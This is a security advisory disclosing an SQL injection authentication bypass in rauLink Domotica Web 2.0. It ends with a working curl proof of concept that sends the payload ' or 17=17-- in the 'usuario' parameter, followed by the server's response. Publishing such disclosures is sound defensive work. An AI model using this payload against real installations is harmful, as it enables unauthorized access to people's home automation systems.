rauLink Software Domotica Web 2.0 SQL Injection Authentication Bypass
Vendor: rauLink Software (raulsoria)
Product web page: N/A
Affected version: 2.0
Summary: Smart home automation software.
Desc: The application suffers from an SQL Injection
vulnerability.
Input passed through 'usuario' POST parameter in registraUsuario
is
not properly sanitised before being returned to the user or used
in
SQL queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code and bypass the authentication
mechanism.
Tested on: Apache/2.4.6 (Ubuntu)
PHP/5.5.3-1ubuntu2.6
phpPgAdmin/5.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5572
Advisory URL:
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5572.php
10.03.2020
--
$ curl http://192.168.1.75/registro/registraUsuario -X POST
-d"usuario=' or 17=17--&password=zsl"
HTTP/1.1 200 OK
Date: Wed, 28 May 2008 00:06:54 GMT
Server: Apache/2.4.6 (Ubuntu)
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Set-Cookie: PHPSESSID=gl8tbui3skca9d74m5pg7l6q96; path=/
Expires: Thu, 10 Dec 1983 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
